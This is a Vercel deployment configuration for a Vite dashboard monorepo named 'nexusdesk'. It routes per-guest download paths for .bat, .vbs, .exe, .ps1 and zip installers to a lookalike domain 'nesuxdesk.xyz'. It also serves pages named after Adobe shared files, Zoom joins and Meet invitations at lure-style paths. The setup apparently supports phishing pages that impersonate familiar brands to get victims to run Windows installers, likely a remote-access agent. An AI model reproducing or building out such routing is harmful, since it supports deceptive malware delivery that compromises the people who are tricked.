{
  "$schema": "https://openapi.vercel.sh/vercel.json",
  "framework": "vite",
  "installCommand": "cd ../.. && npm ci",
  "buildCommand": "cd ../.. && npm run build -w @nexusdesk/types && npm run build -w @nexusdesk/utils && npm run build -w @nexusdesk/shared && npm run build -w @nexusdesk/ui && npm run build -w @nexusdesk/dashboard",
  "outputDirectory": "dist",
  "redirects": [
    {
      "source": "/api/guest/:code/install.bat",
      "destination": "https://api.nesuxdesk.xyz/guest/:code/install.bat",
      "permanent": false
    },
    {
      "source": "/api/guest/:code/setup.vbs",
      "destination": "https://api.nesuxdesk.xyz/guest/:code/setup.vbs",
      "permanent": false
    },
    {
      "source": "/api/guest/:code/setup.exe",
      "destination": "https://api.nesuxdesk.xyz/guest/:code/setup.exe",
      "permanent": false
    },
    {
      "source": "/api/guest/:code/agent-package.zip",
      "destination": "https://api.nesuxdesk.xyz/guest/:code/agent-package.zip",
      "permanent": false
    },
    {
      "source": "/api/guest/:code/windows.ps1",
      "destination": "https://api.nesuxdesk.xyz/guest/:code/windows.ps1",
      "permanent": false
    }
  ],
  "rewrites": [
    { "source": "/api/:path*", "destination": "https://api.nesuxdesk.xyz/:path*" },
    { "source": "/invitation/(.*)", "destination": "/invitation.html" },
    { "source": "/sharedfile/(.*)", "destination": "/adobe.html" },
    { "source": "/adobefile/(.*)", "destination": "/adobe.html" },
    { "source": "/joinzoom/(.*)", "destination": "/zoom.html" },
    { "source": "/gotme/(.*)", "destination": "/meet.html" },
    { "source": "/join/(.*)", "destination": "/zoom.html" },
    { "source": "/((?!assets/).*)", "destination": "/index.html" }
  ],
  "headers": [
    {
      "source": "/meeting/(.*)",
      "headers": [{ "key": "Cache-Control", "value": "public, max-age=86400" }]
    },
    {
      "source": "/assets/(.*)",
      "headers": [{ "key": "Cache-Control", "value": "public, max-age=31536000, immutable" }]
    }
  ]
}
